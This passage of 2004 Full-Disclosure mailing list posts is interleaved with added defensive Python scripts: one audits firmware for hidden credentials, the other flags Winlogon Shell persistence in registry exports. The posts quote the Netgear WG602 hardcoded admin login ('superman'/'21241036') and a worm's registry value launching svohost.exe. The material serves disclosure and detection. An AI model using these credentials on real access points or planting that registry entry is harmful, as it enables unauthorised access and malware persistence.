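            start = pos + 1
    return hits


# Constructed image (not a real WG602 firmware). "superman" is stored in the
# clear; "21241036" is stored XOR 0xA5, which keeps every byte out of the
# printable range so `strings` cannot see it.
USERNAME, PASSWORD = "superman", "21241036"
FIRMWARE = (
    b"\x00" * 64
    + b"boot: loading image (constructed filler)\x00"
    + USERNAME.encode("ascii") + b"\x00"
    + b"\xff" * 32
    + xor_bytes(PASSWORD.encode("ascii"), 0xA5) + b"\x00"
    + b"\x00" * 64
)


def audit(blob, username, password):
    """Compare what `strings` reveals with what the transform-aware search finds."""
    visible = printable_strings(blob)
    return {
        "strings_shows_username": username in visible,
        "strings_shows_password": any(password in s for s in visible),
        "username_hits": find_credential(blob, username),
        "password_hits": find_credential(blob, password),
    }


if __name__ == "__main__":
    for k, v in audit(FIRMWARE, USERNAME, PASSWORD).items():
        print(k, v)
```

Run against a real image, `audit` tells you which transform (if any) the vendor used; a clean result only rules out these simple encodings, not a compressed or encrypted section, which is the limit Rip Toren is pointing at.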


Re: [Full-Disclosure] another new worm submission

2004-06-08 Thread Christoph Gruber

many virusfilters filter *.reg files,
so here the TXT version:



-- 
Christoph Gruber, Security WAT1SE
WAVE Solutions Information Technology GmbH 
Nordbergstrasse 13, A - 1090 Wien, Austria
[EMAIL PROTECTED]
Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1
PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3  C2DF 435A C85C 558E D42B

[EMAIL PROTECTED] wrote on 08.06.2004 10:39:46:

> 
> but I forgot to attach it: 
> 
> -- 
> Christoph Gruber, Senior Security Architect
> WAVE Solutions Information Technology GmbH 
> Nordbergstrasse 13, A - 1090 Wien, Austria
> [EMAIL PROTECTED]
> Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1
> PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3  C2DF 435A C85C 558E D42B 
> 
> [EMAIL PROTECTED] wrote on 07.06.2004 14:06:21:
> 
> > 
> > -BEGIN PGP SIGNED MESSAGE- 
> > Hash: SHA1 
> > 
> > Josh wrote 04.06.2004 21:11:26: 
> > 
> > > http://www.detroit-x.com/analysis.htm 
> > > 
> > > This is something we found this morning. I have packet captures
> > > that I will post. 
> > > I have attached the infected files found with FPORT and also 
> > > registry entries. 
> > > 
> > > We found this rebooting machines with the LSASS.exe error similar 
> > > to Sasser. As of 6/4/2004 we found no virus defs to pick it up. 
> > > 
> > > 
> > > Joshua Perrymon 
> > > Sr. Network Security Consultant 
> > 
> > Hi there! 
> > 
> > There is another Registry-entry: 
> > 
> > 
> > Cheers! 
> > 
> > - -- 
> > Christoph Gruber, Senior Security Architect 
> > WAVE Solutions Information Technology GmbH 
> > Nordbergstrasse 13, A - 1090 Wien, Austria 
> > [EMAIL PROTECTED] 
> > Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1 
> > PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3  C2DF 435A C85C 558E D42B 
> > 
> > 
> > -BEGIN PGP SIGNATURE- 
> > Version: PGP 8.0.3 
> > 
> > iQA/AwUBQMRaFkNayFxVjtQrEQKmYwCg4ufJbS1o/5/C73FUSzBQ+D77OXsAoMLD
> > 82mFBEHVI5D0bGtwTIoLQx9G 
> > =SKaL 
> > -END PGP SIGNATURE-

[Attachment "reg1.reg" deleted by Christoph Gruber/DSI/AT]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe C:\\WINDOWS\\System32\\svohost.exe"
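The Winlogon `Shell` value in the registry entry above is the persistence mechanism of the worm discussed in this thread: anything appended after `explorer.exe` is started with the shell, and the dropped file name `svohost.exe` is one character away from the legitimate `svchost.exe`. The following is an added example (not from the thread or from any product) that parses a regedit export, reports anything in `Shell` beyond `explorer.exe`, and flags program names that are one edit away from a system process name. The exports it runs on are constructed in regedit's own format (UTF-16LE with BOM, version header) with the value Christoph Gruber posted; the list of system names it compares against is my own choice.

```python
"""Check a regedit export for the Winlogon Shell persistence shown in the thread.

Added example, not from the thread or from any product. SAMPLE_REG is a
constructed export in regedit's own format (UTF-16LE with BOM, version header),
carrying the Shell value Christoph Gruber posted; CLEAN_REG carries the default.
"""
import re

WINLOGON = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon"
DEFAULT_SHELL = "explorer.exe"
# Process names a dropper tends to imitate; used for the look-alike check.
SYSTEM_NAMES = ["svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe",
                "services.exe", "explorer.exe"]
VALUE_RE = re.compile(r'"((?:[^"\\]|\\.)*)"\s*=\s*"((?:[^"\\]|\\.)*)"')


def decode_reg(data):
    """regedit 5.x writes UTF-16LE with a BOM; REGEDIT4 exports are 8-bit text."""
    if data.startswith(b"\xff\xfe"):
        return data.decode("utf-16")
    return data.decode("latin-1")


def unescape(s):
    return s.replace('\\\\', '\\').replace('\\"', '"')


def parse_reg(text):
    """{key (lower-cased): {value name: string data}} for REG_SZ entries."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"'):
            m = VALUE_RE.match(line)
            if m:
                keys[current][unescape(m.group(1))] = unescape(m.group(2))
    return keys


def edit_distance(a, b):
    """Levenshtein distance, used to spot svohost.exe-style look-alike names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_winlogon_shell(text):
    """Report anything in Shell besides explorer.exe, plus look-alike program names."""
    shell = parse_reg(text).get(WINLOGON, {}).get("Shell")
    if shell is None:
        return {"shell": None, "extra": [], "lookalikes": []}
    tokens = [t for t in re.split(r"[,\s]+", shell) if t]
    extra = [t for t in tokens if t.lower() != DEFAULT_SHELL]
    lookalikes = []
    for t in extra:
        base = t.rsplit("\\", 1)[-1].lower()
        for name in SYSTEM_NAMES:
            if base != name and edit_distance(base, name) == 1:
                lookalikes.append((base, name))
    return {"shell": shell, "extra": extra, "lookalikes": lookalikes}


def _export(shell_value):
    """Build a constructed regedit 5.00 export containing one Shell value."""
    text = ("Windows Registry Editor Version 5.00\r\n\r\n"
            "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]\r\n"
            '"Shell"="' + shell_value + '"\r\n')
    return b"\xff\xfe" + text.encode("utf-16-le")


# Constructed exports (not captured from an infected machine).
SAMPLE_REG = _export("explorer.exe C:\\\\WINDOWS\\\\System32\\\\svohost.exe")
CLEAN_REG = _export("explorer.exe")

if __name__ == "__main__":
    print(check_winlogon_shell(decode_reg(SAMPLE_REG)))
    print(check_winlogon_shell(decode_reg(CLEAN_REG)))
```

Feed it the output of `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" winlogon.reg` from a suspect host; the BOM check is there because that file is UTF-16, which is also why the thread's TXT copy starts with the stray "ÿþ" bytes.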

Re: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability

2004-06-08 Thread Jan Jungnickel
On Tue, Jun 08, 2004 at 10:05:56AM +0200, [EMAIL PROTECTED] wrote:

> >Netgear has 'fixed' this by changing the username and
> >password to something else. 
> I heard the username has been changed to "superman" with the
> password "21241036". I wonder whose phone number THIS is...

Precisely. I'm pretty stunned by this blatant example of
stupidity :/

-- 
carmunity.com GmbH  Mary-Astell-Strasse 2
Jan Jungnickel  28359 Bremen
Telefon: +49-421-6265-110   E-Mail: [EMAIL PROTECTED]
Telefax: +49-421-6265-100   http://www.carmunity.de/




Re: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability

2004-06-08 Thread die tuere
On Tuesday 08 June 2004 10:05, [EMAIL PROTECTED] wrote:
> I heard the username has been changed to "superman" with the 
> password "21241036". I wonder whose phone number THIS is...

maybe it's superman's phone number, or just pick up the phone and hit in those 
numbers ;)

buzz



Re: [Full-Disclosure] another new worm submission

2004-06-08 Thread Christoph Gruber

but I forgot to attach it:



-- 
Christoph Gruber, Senior Security Architect
WAVE Solutions Information Technology GmbH 
Nordbergstrasse 13, A - 1090 Wien, Austria
[EMAIL PROTECTED]
Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1
PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3  C2DF 435A C85C 558E D42B

[EMAIL PROTECTED] wrote on 07.06.2004 14:06:21:

> 
> -BEGIN PGP SIGNED MESSAGE- 
> Hash: SHA1 
> 
> Josh wrote 04.06.2004 21:11:26: 
> 
> > http://www.detroit-x.com/analysis.htm 
> > 
> > This is something we found this morning. I have packet captures
> > that I will post. 
> > I have attached the infected files found with FPORT and also
> > registry entries. 
> > 
> > We found this rebooting machines with the LSASS.exe error similar
> > to Sasser. As of 6/4/2004 we found no virus defs to pick it up.
> > 
> > 
> > Joshua Perrymon 
> > Sr. Network Security Consultant 
> 
> Hi there! 
> 
> There is another Registry-entry: 
> 
> 
> Cheers! 
> 
> - -- 
> Christoph Gruber, Senior Security Architect 
> WAVE Solutions Information Technology GmbH 
> Nordbergstrasse 13, A - 1090 Wien, Austria 
> [EMAIL PROTECTED] 
> Office: +43 1 71730 53514, Mobile: +43 664 81 22 66 1 
> PGP-Fingerprint: CCFF 5D66 7073 952C 7AB3  C2DF 435A C85C 558E D42B 
> 
> 
> -BEGIN PGP SIGNATURE- 
> Version: PGP 8.0.3 
> 
> iQA/AwUBQMRaFkNayFxVjtQrEQKmYwCg4ufJbS1o/5/C73FUSzBQ+D77OXsAoMLD 
> 82mFBEHVI5D0bGtwTIoLQx9G 
> =SKaL 
> -END PGP SIGNATURE-

reg1.reg
Description: Binary data


Re: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability

2004-06-08 Thread pera
>Netgear has 'fixed' this by changing the username and password
>to something else. 

I heard the username has been changed to "superman" with the 
password "21241036". I wonder whose phone number THIS is...

- Pera


